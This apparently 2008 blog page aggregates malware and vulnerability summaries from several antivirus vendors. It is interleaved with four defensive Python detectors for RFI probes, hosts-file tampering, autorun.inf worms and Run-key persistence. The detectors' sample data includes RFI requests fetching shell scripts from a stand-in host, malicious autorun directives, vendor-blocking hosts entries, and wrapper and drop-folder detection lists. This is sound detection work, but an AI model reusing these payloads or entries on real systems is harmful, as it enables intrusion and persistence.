IRCBot.BNZ is a backdoor. It can be instructed to scan for vulnerable target machines, update itself, as well
as download and execute arbitrary files.
...
Packed:W32/Tibs.GU - Packed:W32/Tibs.GU at F-Secure
Files that are detected as Packed.Win32.Tibs.gu have similar functionality to Email-Worm.Win32.Zhelatin
variants....
Trojan-Spy:W32/ZBot.HS - Trojan-Spy:W32/ZBot.HS at F-Secure
Trojan-Spy:W32/ZBot.HS is a trojan-spy. Trojan-spy applications attempt to steal online banking
login-information and other sensitive data from the infected computer.
...
Trojan-Downloader.SWF.Gida.A - Trojan-Downloader.SWF.Gida.A at F-Secure
Trojan-Downloader.SWF.Gida.A is a detection for Adobe Flash files that have been seen served over Hypertext
Transfer Protocol (HTTP) and linked from advertisement sites. It injects additional HTML content into the
viewed webpage, which then serves malicious content.
...
IM-Worm:W32/Sohanad - IM-Worm:W32/Sohanad at F-Secure
IM-Worm:W32/Sohanad is a family of worms that spread via instant messaging software, primarily Yahoo Messenger.
...
Trojan-PSW:W32/Lmir.BPG - Trojan-PSW:W32/Lmir.BPG at F-Secure
This is a typical Trojan that logs keystrokes (a keylogger) and the URLs visited by the user.
...
Trojan:W32/AutoIt.BN - Trojan:W32/AutoIt.BN at F-Secure
Trojan:W32/Autoit.BN is a trojan that copies itself to USB memory sticks, deletes anti-virus software, and
changes system settings.
...
Trojan-Spy:W32/Banker.GMH - Trojan-Spy:W32/Banker.GMH at F-Secure
This Trojan steals banking information and has the capability to update itself.
...
Exploit:PHP/Preamble - Exploit:PHP/Preamble at F-Secure
Exploit:PHP/Preamble is a detection for a family of various PHP scripts. The scripts are used to test whether
a particular site is vulnerable to Remote File Inclusion (RFI) exploitation.
...
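RFI probes such as the Exploit:PHP/Preamble scripts leave a distinctive trace in web-server logs: a query parameter whose value is a full URL (or a PHP stream wrapper) pointing at a remote script. The following detector is an added example, not code from the page or from F-Secure; it parses combined-format access-log lines, inspects every query parameter, and reports values that a PHP include() would fetch from elsewhere. The log lines, hostnames and IP addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (combined format); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Mar/2008:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Mar/2008:10:01:09 +0000] "GET /index.php?page=http://203.0.113.9/id.txt? HTTP/1.1" 200 1337 "-" "libwww-perl/5.805"
203.0.113.7 - - [19/Mar/2008:10:01:11 +0000] "GET /modules/x/config.php?absolute_path=ftp://203.0.113.9/shell.txt%3F HTTP/1.1" 404 200 "-" "libwww-perl/5.805"
192.0.2.3 - - [19/Mar/2008:10:02:00 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.8 - - [19/Mar/2008:10:02:30 +0000] "POST /login.php HTTP/1.1" 302 0 "http://example.test/login.php" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target HTTP/x", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)

# What include()/require() will open remotely when allow_url_include is on,
# plus the local stream wrappers attackers fall back to when it is off.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")
PHP_WRAPPERS = ("php://", "data:", "expect://", "phar://", "zip://", "compress.zlib://")


def classify_value(value):
    """Return why a query value looks like an include() payload, or None if it does not."""
    v = value.strip().lower()
    if v.startswith(REMOTE_SCHEMES):
        return "remote-url"
    if v.startswith(PHP_WRAPPERS):
        return "php-wrapper"
    return None


def find_rfi_attempts(log_text):
    """Scan access-log lines and return one finding per suspicious query parameter.

    Only the request target's query string is inspected; a URL in the Referer
    field (last sample line) is normal and must not trigger."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind is None:
                continue
            findings.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "path": parts.path,
                "param": name,
                "value": value,
                "kind": kind,
                "status": int(m.group("status")),
            })
    return findings


def attackers_by_volume(findings):
    """Rank source addresses by number of RFI probes, busiest first."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']:15} {f['kind']:12} {f['path']}?{f['param']}={f['value']} -> {f['status']}")
    print(attackers_by_volume(hits))
```

A 200 response to a probe whose value is a remote URL (second sample line) deserves immediate follow-up, since the included script has then most likely already executed; 404s only tell you the scanner guessed a path that does not exist on this host.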
Worm:SymbOS/HatiHati.A - Worm:SymbOS/HatiHati.A at F-Secure
HatiHati.A is a worm-like application that spreads via MMC cards. Once the worm copies itself to a new device,
it starts sending a very high volume of SMS messages to a predefined number. In most instances, the number
to which HatiHati.A is attempting to send is +3396003964.
...
Email-Worm:W32/Zhelatin.TQ - Email-Worm:W32/Zhelatin.TQ at F-Secure
Zhelatin.TQ, like its predecessors, is a bot that communicates via Overnet P2P protocol and is mainly used to
send spam....
Trojan-Downloader:W32/MyDrill.A - Trojan-Downloader:W32/MyDrill.A at F-Secure
MyDrill.A is a detection for files used as part of a Malaysian cyber security drill that took place during 2007.
MyDrill.A files are harmless test files; detection was added for the purpose of the drill.
...
Trojan:W32/Agent.DXH - Trojan:W32/Agent.DXH at F-Secure
Trojan:W32/Agent.DXH or Trojan.Win32.Agent.dxh contains an encrypted payload. Agent.DXH appears to be a
component of a malware that targets Italian computer users.
...
Trojan:W32/Renos.H - Trojan:W32/Renos.H at F-Secure
Trojan:W32/Renos.H attempts to lure the computer user into downloading "rogueware" by presenting pop-up
windows that warn of a supposed threat. In addition, Renos.H modifies the computer's hosts file in such a way
that accessing the websites of many antivirus vendors is blocked.
...
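The hosts-file trick Renos.H uses is easy to audit because a hosts file has no business pointing public names at the loopback address. The checker below is an added example, not code from the page or from F-Secure: it parses hosts-file syntax (comments, tabs, several names per line, IPv6), reports every non-local name that is sunk to loopback or 0.0.0.0, and separately reports names pinned to non-private addresses, which is the pharming variant of the same edit. The sample hosts content and the vendor-domain list are constructed for the example and should be replaced with your own.

```python
import ipaddress

# Constructed sample hosts file (not from the page); the vendor lines mimic what Renos.H writes.
HOSTS_SAMPLE = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
127.0.0.1       localhost
::1             localhost
127.0.0.1       www.symantec.com symantec.com   # added by malware
127.0.0.1       www.mcafee.com
0.0.0.0         update.f-secure.com
192.0.2.50      www.example-bank.test
10.0.0.20       intranet.corp.test
"""

# Names that legitimately map to the loopback address.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters"}

# Illustrative security-vendor domains (assumption: extend with the vendors you actually run).
VENDOR_SUFFIXES = ("symantec.com", "mcafee.com", "f-secure.com", "kaspersky.com",
                   "sophos.com", "trendmicro.com", "pandasecurity.com", "microsoft.com")

# Overrides to these ranges are usually intentional split-horizon entries, so they are not reported.
PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "fc00::/7")]


def parse_hosts(text):
    """Yield (line_no, address, [hostnames]) for every effective entry; comments are stripped."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line: the resolver ignores it, so do we
        yield line_no, addr, [h.lower() for h in fields[1:]]


def is_vendor(name):
    return any(name == s or name.endswith("." + s) for s in VENDOR_SUFFIXES)


def audit_hosts(text):
    """Return a finding for each hostname that is blackholed or redirected off-network."""
    findings = []
    for line_no, addr, names in parse_hosts(text):
        for name in names:
            if name in LOCAL_NAMES:
                continue
            if addr.is_loopback or addr.is_unspecified:
                reason = "blackholed"          # Renos.H style: vendor site becomes unreachable
            elif any(addr in net for net in PRIVATE_NETS):
                continue                       # internal override, treated as benign here
            else:
                reason = "redirected"          # pharming style: name pinned to an external host
            findings.append({"line": line_no, "host": name, "ip": str(addr),
                             "reason": reason, "vendor": is_vendor(name)})
    return findings


if __name__ == "__main__":
    for f in audit_hosts(HOSTS_SAMPLE):
        flag = " (security vendor)" if f["vendor"] else ""
        print(f"line {f['line']}: {f['host']} -> {f['ip']} [{f['reason']}]{flag}")
```

On Windows the file to feed in is %SystemRoot%\system32\drivers\etc\hosts; on Unix-like systems /etc/hosts. A vendor name marked "blackholed" is a strong indicator on its own, since no supported configuration writes such an entry.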
Trojan-Downloader:W32/Agent.ICF - Trojan-Downloader:W32/Agent.ICF at F-Secure
Trojan-Downloader:W32/Agent.ICF attempts to download files. It also drops files and writes to the system
registry....
Trojan:W32/Kine - Trojan:W32/Kine at F-Secure
Trojan:W32/Kine is a family of data stealing trojans.
...
Trojan:W32/Delf.AOO - Trojan:W32/Delf.AOO at F-Secure
Trojan:W32/Delf.AOO is a trojan. This malware uses a hidden browser process (e.g. iexplorer.exe) to hide
itself in the system's process list. It terminates antivirus applications by searching for antivirus company
strings in the title bars of all application windows.
...
Email-Worm:W32/Agent.BC - Email-Worm:W32/Agent.BC at F-Secure
This malware normally arrives downloaded by other trojan packages. Depending on the supplied parameter, this
malware can send numerous spam messages.
...
Worm:SymbOS/Beselo.B - Worm:SymbOS/Beselo.B at F-Secure
Beselo.B is an MMS and Bluetooth worm that operates on Symbian S60 Second Edition devices. Beselo.B spreads
via MMS messages and Bluetooth using the filenames beauty.jpg, sex.mp3, or love.rm.
...
Trojan-Downloader:W32/Agent.ACL - Trojan-Downloader:W32/Agent.ACL at F-Secure
This trojan is usually dropped by other malware installation packages. On execution, it downloads and executes
another trojan file on the system.
...
Trojan.Swfpharm - Trojan.Swfpharm at Norton Symantec
Trojan.Swfpharm is a Trojan horse that attempts to modify settings on 2Wire routers and redirects users to
potentially malicious Web sites.
...
W32.Golem.A - W32.Golem.A at Norton Symantec
W32.Golem.A is a virus that spreads by infecting .exe files on all local and mapped drives except the system
drive....
Adware.Superiorads - Adware.Superiorads at Norton Symantec
Adware.Superiorads is an adware program that installs a Browser Helper Object for Internet Explorer
and displays advertisements on the computer.
...
W32.IRCBot.DCN - W32.IRCBot.DCN at Norton Symantec
W32.IRCBot.DCN is a worm that spreads through network shares and by exploiting certain vulnerabilities. It
also opens a back door on the compromised computer.
...
Spyware.PCGhost - Spyware.PCGhost at Norton Symantec
Spyware.PCGhost is a spyware program that logs keystrokes, tracks internet activity, and records mouse
clicks....
SpywarePro - SpywarePro at Norton Symantec
SpywarePro is a misleading application that may give exaggerated reports of threats on the computer.
...
SpywareSweeperPro - SpywareSweeperPro at Norton Symantec
SpywareSweeperPro is a misleading application that may give exaggerated reports of threats on the
computer....
MalwareCore - MalwareCore at Norton Symantec
MalwareCore is a misleading application that may give exaggerated reports of threats on the computer.
...
Bloodhound.Exploit.181 - Bloodhound.Exploit.181 at Norton Symantec
Bloodhound.Exploit.181 is a heuristic detection for Works files attempting to exploit the Microsoft Excel
Conditional Formatting Values Remote Code Execution Vulnerability (BID 28170).
...
W32/Traxg@MM - W32/Traxg@MM at McAfee
When executed, this worm drops a copy of itself in the following folder: %System%\Fonts\27DE5.com [file name
used is random]. Note: %System% refers to the Windows system folder. It then creates the following registry
entry to ensure its execution at system startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunTempCom...
SymbOS/Beselo - SymbOS/Beselo at McAfee
--- Update January 23, 2008 --- The risk assessment of this threat was updated to Low-Profiled due to media
attention. To obtain an ED for this threat please visit: http://www.webimmune.net/extra/getextra.aspx ...
KillJWS - KillJWS at McAfee
-- Update January 18, 2008 -- The risk assessment of this threat has been updated to Low-Profiled due to media
attention at: http://www.webuser.co.uk/news/174689.html -- Upon execution, the trojan drops the following files
into the %WinDir% folder: %WinDir%\Config\svchost.exe, %WinDir%\system32\securityService.dll, %WinDir%\mci32.exe
(where %WinDi...
PWS-LegMir.gen.k - PWS-LegMir.gen.k at McAfee
PWS-LegMir.gen.k drops PWS-LegMir.gen.k.dll, which steals passwords from multiple games. It spreads using an
autorun.inf in the root folder of the drives available on the system and downloads updates of itself. The
following files are dropped: %DRIVELETTER%\h2.com, %DRIVELETTER%\autorun.inf, %TEMPDIR%\ee2m.dll,
%SYSTEM%\kavo.exe, %SYSTEM%...
JS/Exploit-YahooGrid - JS/Exploit-YahooGrid at McAfee
JS/Exploit-YahooGrid is a generic detection for exploits of a buffer overflow vulnerability in the YMPDataGrid
(datagrid.dll) and YMGMediaGridAx (mediagridax.dll) ActiveX controls shipped with Yahoo! Music Jukebox and
Yahoo! Messenger. The buffer overflow occurs when a long string is supplied to the AddImage, AddButton or
AddBitmap function...
PWS-LegMir.gen.k.dll - PWS-LegMir.gen.k.dll at McAfee
PWS-LegMir.gen.k.dll is dropped by PWS-LegMir.gen.k. It steals passwords from multiple games. It may also
detect and terminate antivirus applications. The following antivirus applications are detected and terminated:
KAV (Kaspersky), RAV (Rising), AVP (Kaspersky), KAVSVC (Kaspersky) ...
W32/Atin.worm - W32/Atin.worm at McAfee
This worm uses a folder icon. On execution, it copies itself into every folder on all drives, using the same
name as the host folder. It also copies itself to removable drives. The worm changes the window title of
Internet Explorer by adding the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Internet E...
Puper!677223db - Puper!677223db at McAfee
A scandal in Hong Kong is being used to entice users to download fake codecs and install this malware. The
Trojan disguises itself with a Windows Media file icon. Once running, the trojan accesses the following
webpage: http://69.50.164.54/this/[removed]/stereo/music.php and downloads the following file: http://d...
Linux/Exploit-vmsplice - Linux/Exploit-vmsplice at McAfee
This detection covers CVE-2008-0600. Linux/Exploit-vmsplice elevates an ordinary user's privileges to root by
exploiting a kernel vulnerability through the vmsplice() system call. More information about this vulnerability
at: http://www.avertlabs.com/research/blog/index.php/2008/02/13/analyzing-the-linux-kernel-vmsplice-exploit/...
Exploit-PDF.b - Exploit-PDF.b at McAfee
-- Update February 11, 2008 -- The risk assessment of this threat has been updated to Low-Profiled due to
media attention at:
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9061938&intsrc=news_ts_head
-- These maliciously crafted PDF files exploit a buffer overflow vulnerability in Adobe Reader wh...
Generic RootKit.h - Generic RootKit.h at McAfee
This detection, Generic RootKit.h, covers several specific trojan variants, so this description is meant as a
general guide. Rootkits are programs (device drivers) that can potentially be used with any malware to hide,
or stealth, files, processes, registry keys, and network connections. Additionally, they make it harder
to det...
W32/Autorun.worm.bx - W32/Autorun.worm.bx at McAfee
This detection is for a worm. It attempts to spread to removable drives by creating an autorun.inf file, which
will run the worm automatically if the system the removable drive is plugged into has Autorun enabled. This
worm adds the following files and registry entries to load itself on startup. Files: c:\WINDOWS\system32\amvo.exe
c:\WINDOWS\sys...
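Worm:VBS/HeadTail.A, PWS-LegMir.gen.k and W32/Autorun.worm.bx above all rely on the same mechanism: an autorun.inf in a drive's root whose open=, shellexecute= or shell\<verb>\command= directive names a dropped executable. Because these files are often padded with junk lines to defeat strict INI parsers, a triage tool has to be tolerant. The script below is an added example, not code from the page or from any of the vendors quoted; the two autorun.inf samples are constructed, the malicious one reusing the file names this page reports (h2.com, RECYCLER\Oil.exe).

```python
# Constructed autorun.inf samples (not from the page). The malicious one follows the pattern
# these worms write: several launch directives plus junk lines that break naive INI parsers.
MALICIOUS_INF = r"""[AutoRun]
;kjhkjhkjhdfskjh
open=h2.com
shell\open\Command=h2.com
shell\explore\Command=h2.com
shellexecute=h2.com
shell\Auto\command=RECYCLER\Oil.exe
shell=Auto
kjhkjhkjhdfsk
"""

BENIGN_INF = r"""[autorun]
icon=driveicon.ico
label=Backup Drive
"""

EXEC_KEYS = {"open", "shellexecute"}
EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js", ".wsf", ".hta")
HIDDEN_DIRS = ("recycler", "$recycle.bin", "system volume information")


def parse_autorun(text):
    """Tolerant INI parse: (key_lower, value) pairs from the [autorun] section only.

    Junk lines without '=' and comment lines are skipped instead of raising,
    which is what Windows does and what the worms count on."""
    pairs = []
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("["):
            in_section = "autorun" in line.lower()
            continue
        if not in_section or "=" not in line:
            continue
        key, _, value = line.partition("=")
        pairs.append((key.strip().lower(), value.strip().strip('"')))
    return pairs


def triage_autorun(text):
    """Return one finding per directive that can cause code execution on insertion/double-click."""
    findings = []
    for key, value in parse_autorun(text):
        low = value.lower()
        is_launch = key in EXEC_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))
        if is_launch:
            reasons = ["launch directive"]
            if low.endswith(EXEC_EXT):
                reasons.append("executable target")
            if any(d in low for d in HIDDEN_DIRS):
                reasons.append("target in hidden system folder")
            findings.append({"key": key, "value": value, "reasons": reasons})
        elif key == "shell" and value:
            # shell=<verb> makes the custom verb the default action for the drive.
            findings.append({"key": key, "value": value,
                             "reasons": ["default verb overridden to shell\\%s\\command" % low]})
    return findings


def verdict(text):
    return "suspicious" if triage_autorun(text) else "clean"


if __name__ == "__main__":
    for sample in (MALICIOUS_INF, BENIGN_INF):
        print(verdict(sample))
        for f in triage_autorun(sample):
            print("  %-22s = %-18s %s" % (f["key"], f["value"], "; ".join(f["reasons"])))
```

On a drive image, run this over every root-level autorun.inf and also on the files in each folder, since some of the worms above (W32/Atin.worm, for instance) plant copies in subfolders. A clean result only means no launch directive is present; it says nothing about the icon/label lines, which are legitimate.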
W32/Caffer@MM - W32/Caffer@MM at McAfee
-- Update February 21, 2008 -- The risk assessment of this threat has been updated to Low-Profiled due to media
attention at: http://www.repubblica.it/2008/02/sezioni/cronaca/truffa-mail/truffa-mail/truffa-mail.html An
English translation is available here. -- The malware is compressed with Npack in order to protect its
behaviour from to...
WinCE/Infojack - WinCE/Infojack at McAfee
WinCE/InfoJack is distributed in a file named "小游戏1.cab". (Fig 1: WinCE/InfoJack is
installed with a collection of legitimate games.) WinCE/InfoJack installs to the handset and any installed memory
card. The following files will be installed: \Windows\mservice.exe \Windows\setup.cfg
\Windows\StartUp\mservice.ln...
Puper!69ccd856 - Puper!69ccd856 at McAfee
Once running, the Trojan adds the following registry key to install a fake security Toolbar,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar
"{81705D67-3F73-4983-859B-97D0922E5ABE}"
When the user clicks on the toolbar button “Block adware / popups”,...
BackDoor-DNM - BackDoor-DNM at McAfee
Upon execution, this trojan copies itself into the %System32% folder as "CbEvtSvc.exe". It then launches the
new executable as a new system service. Files added: %system32%\CbEvtSvc.exe. Registry entries added:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CbEvtSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CbEvtSvc\Enum
HKEY...
W32/Scrapkut.worm - W32/Scrapkut.worm at McAfee
--- Update March 3, 2008 --- The risk assessment of this threat was updated to Low-Profiled due to media
attention. To receive an extra.dat file for this threat please visit: https://www.webimmune.net/extra/getextra.aspx
The downloader component of the worm has the following attributes: File size: 239,616 bytes; FileName:
flashx_p....
SomeFun - SomeFun at McAfee
On execution, this program displays a message box. Meanwhile, it creates a text file on the desktop named
"OWNED BY EVIL KID!!!.TXT" containing a fixed text. On every execution of this trojan, the same text is
appended to this file.
 ...
W32/Realcen@M - W32/Realcen@M at McAfee
When executed, this worm displays a message. The worm then drops the following files: C:\autorun.inf
C:\RECYCLER\Oil.exe %System%\windows.exe %System%\WinMail.vxd %System%\WinMS.vxd %System%\WinSrc.vxd Note:
%System% is a variable location and refers to the Windows system directory. The following registry entries are
modified to e...
SymbOS/SmsSend.F - SymbOS/SmsSend.F at McAfee
SymbOS/SmsSend.F is distributed as a component of SymbOS/Multidropper.CR. SymbOS/SmsSend.F sends an SMS
without user permission to the number 17001002. The message will register a new QQ instant messaging account
for the user....
SymbOS/MultiDropper.CR - SymbOS/MultiDropper.CR at McAfee
SymbOS/MultiDropper.CR is distributed as a SIS file. All of the component malware is set to run on
installation. The interaction of the various component malware works to extort money from the user.
SymbOS/MultiDropper.CR attempts to sign the user up to a QQ account. It also forwards all SMS to the
malware author. Inco...
SymbOS/Kiazha.A - SymbOS/Kiazha.A at McAfee
-- Update March 05, 2008 -- The risk assessment of this threat has been updated to Low-Profiled due to media
attention at: http://www.channelregister.co.uk/2008/03/05/mobile_ransomware_trojan/ -- SymbOS/Kiazha.A is
distributed within SymbOS/MultiDropper.CR. After installation SymbOS/Kiazha.A is run immediately. After a
delay SymbOS/Kiazh...
StartPage-KG - StartPage-KG at McAfee
StartPage-KG writes itself to the following location: %WINDOWS%\rundll32.exe. The following registry entries
are modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Driver:
"%WINDOWS%\rundll32.exe" HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page:
"http://www.[removed]...
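Two persistence entries on this page show the pattern worth hunting for in Run keys: StartPage-KG registers a file called rundll32.exe that lives in %WINDOWS% rather than system32, and W32/Traxg@MM registers a .com file dropped under %System%\Fonts. The audit below is an added example, not code from the page or from McAfee; it parses a `reg export` text file (constructed here, with the two malicious values modelled on those entries and two ordinary ones beside them), extracts the image path from each Run/RunOnce value, and flags well-known binary names outside their expected directory, odd extensions, and drop folders. The Windows directory C:\WINDOWS and the expected-location table are assumptions for the example.

```python
import re
import ntpath

# Constructed .reg export (what "reg export" writes); not taken from the page.
# .reg string data doubles backslashes and escapes embedded quotes as \".
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"Adobe Reader Speed Launcher"="\"C:\\Program Files\\Adobe\\Reader 8.0\\Reader\\Reader_sl.exe\""
"27DE5"="C:\\WINDOWS\\system32\\Fonts\\27DE5.com"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Windows Driver"="C:\\WINDOWS\\rundll32.exe"
"""

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')

# Assumption: default install with the Windows directory at C:\WINDOWS.
EXPECTED_DIR = {
    "rundll32.exe": r"C:\WINDOWS\system32",
    "svchost.exe": r"C:\WINDOWS\system32",
    "ctfmon.exe": r"C:\WINDOWS\system32",
    "explorer.exe": r"C:\WINDOWS",
}
DROP_DIRS = ("\\fonts\\", "\\temp\\", "\\recycler\\", "\\config\\")   # folders seen in this feed
ODD_EXT = (".com", ".scr", ".pif", ".bat")


def unescape(s):
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_run_values(reg_text):
    """Return (key, value_name, command_line) for every REG_SZ value under a Run/RunOnce key."""
    entries, key = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        if key is None or not RUN_KEY_RE.search(key):
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        data = m.group(2)
        if not (data.startswith('"') and data.endswith('"')):
            continue  # hex(2)/binary data not handled in this example
        entries.append((key, unescape(m.group(1)), unescape(data[1:-1])))
    return entries


def image_path(cmdline):
    """First token of a command line, honouring a quoted path with spaces."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split()[0] if cmdline else ""


def audit_run_entries(reg_text):
    findings = []
    for key, name, cmd in parse_run_values(reg_text):
        low = image_path(cmd).lower()
        directory, base = ntpath.split(low)
        reasons = []
        expected = EXPECTED_DIR.get(base)
        if expected and directory != expected.lower():
            reasons.append("%s outside %s" % (base, expected))
        if any(d in low for d in DROP_DIRS):
            reasons.append("image in drop folder")
        if low.endswith(ODD_EXT):
            reasons.append("unusual executable extension")
        if reasons:
            findings.append({"key": key, "name": name, "image": image_path(cmd), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_entries(REG_EXPORT):
        print("%s\\%s -> %s: %s" % (f["key"], f["name"], f["image"], "; ".join(f["reasons"])))
```

Export the keys on the suspect machine with `reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" run.reg` (and likewise for HKCU), then feed the file in. The expected-directory table is deliberately short; a same-name binary in the wrong folder is the StartPage-KG trick, and it is one that simple "is rundll32.exe in the Run key" rules miss.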
Monagrey - Monagrey at McAfee
-- Update March 4, 2008 -- The risk assessment of this threat has been updated to Low-Profiled due to
media attention at:
http://www.scmagazineus.com/New-virus-tries-to-dupe-victims-into-googling-its-name/article/107612/ -- Monagrey
is a trojan which modifies the IE start page and prevents common applications from running. It will modify...
TROJ_DROPPER.EUO - TROJ_DROPPER.EUO at Trend Micro
This Trojan may be dropped by other malware. Upon execution, this Trojan creates a folder. It also drops a file
which Trend Micro detects as TROJ_DROPPER.EUO.
...
TROJ_BAGLE.QU - TROJ_BAGLE.QU at Trend Micro
This Trojan may be dropped by other malware. It may be downloaded unknowingly by a user when visiting
malicious Web sites. It creates folders. It modifies the affected system's registry to perform certain actions
on the affected system, such as automatically executing at every system startup. It hides files, processes,
and/or registr...
TROJ_DLOADER.CUA - TROJ_DLOADER.CUA at Trend Micro
...
PE_TRATS.E-O - PE_TRATS.E-O at Trend Micro
This file infector may be downloaded unknowingly from certain Web sites. Upon execution, this file infector
creates a folder and drops several files. It registers itself as a Browser Helper Object (BHO) to ensure its
automatic execution every time Internet Explorer is run. It also modifies a registry entry to enable its
automatic ex...
SWF_ADHIJACK.E - SWF_ADHIJACK.E at Trend Micro
This malicious Shockwave Flash (.SWF) object file may arrive on a system via an email informing users that they
have received a postcard. Below is a screenshot of the object it displays: Once clicked, this object file
attempts to modify the 2wire modem's localhost table to perform pharming against a certain bank. It does
this by p...
TROJ_SMALL.EAI - TROJ_SMALL.EAI at Trend Micro
...
TROJ_DLOADER.MJZ - TROJ_DLOADER.MJZ at Trend Micro
...
JS_AGENT.OEZ - JS_AGENT.OEZ at Trend Micro
...
TROJ_AGENT.ERP - TROJ_AGENT.ERP at Trend Micro
...
WORM_SOCKS.D - WORM_SOCKS.D at Trend Micro
This worm arrives via email messages spammed by another malware or by a malicious user. It may also be dropped
by other malware. Instead of attaching copies of itself to email messages, this worm asks users to click a link
in the message. This is an effective way for it to bypass email applications that scan for malicious
attachments....
Autorun.RS - Autorun.RS at Panda
It downloads several variants belonging to the Lineage family, which is designed to steal passwords related to
online games. It also downloads an update of itself and uses several techniques in order to make its detection
more difficult. It spreads through local, removable and mapped drives.
...
MS08-017 - MS08-017 at Panda
It is a group of critical vulnerabilities in Office Web Components 2000 which allow attackers to gain remote
control of the affected computer with the same privileges as the logged-on user.
...
MS08-016 - MS08-016 at Panda
...
MS08-015 - MS08-015 at Panda
It is a critical vulnerability in several versions of Outlook which allows attackers to gain remote control of
the affected computer with the same privileges as the logged-on user.
...
MS08-014 - MS08-014 at Panda
It is a group of critical vulnerabilities in several versions of Excel which allow attackers to gain remote
control of the affected computer with the same privileges as the logged-on user.
...
EbayRob.B - EbayRob.B at Panda
Its main objective is to steal the information entered on certain websites, such as eBay, by redirecting the
user to another site that imitates the original. It then sends the gathered data to its author. It does not
spread automatically by its own means.
...
Winfake.A - Winfake.A at Panda
It passes itself off as a Word document in order to deceive users into thinking it is a harmless document. It
makes several modifications to the Windows Registry which prevent the computer from working properly. It
spreads through mapped drives.
...
FakeDeath.A - FakeDeath.A at Panda
It reaches the computer passing itself off as news about the fake death of Fidel Castro. It downloads several
Trojans belonging to the Banker family to the affected computer and distributes them through the shared
directories of programs such as mIRC, eDonkey or KaZaA.
...
Banker.KTG - Banker.KTG at Panda
Its main objective is to steal passwords of any type from the affected computer. It reaches the computer
downloaded by a variant of the Nabload Trojan, passing itself off as a video. It does not spread automatically
by its own means.
...
MonaRona.A - MonaRona.A at Panda
It downloads Application/Unigray onto the computer, a program that reports non-existent malware on the
affected computer and prevents users from working properly, as it terminates certain programs such as several
Office applications. It does not spread automatically by its own means.
...
0 writebacks [03/19/2008 11:05]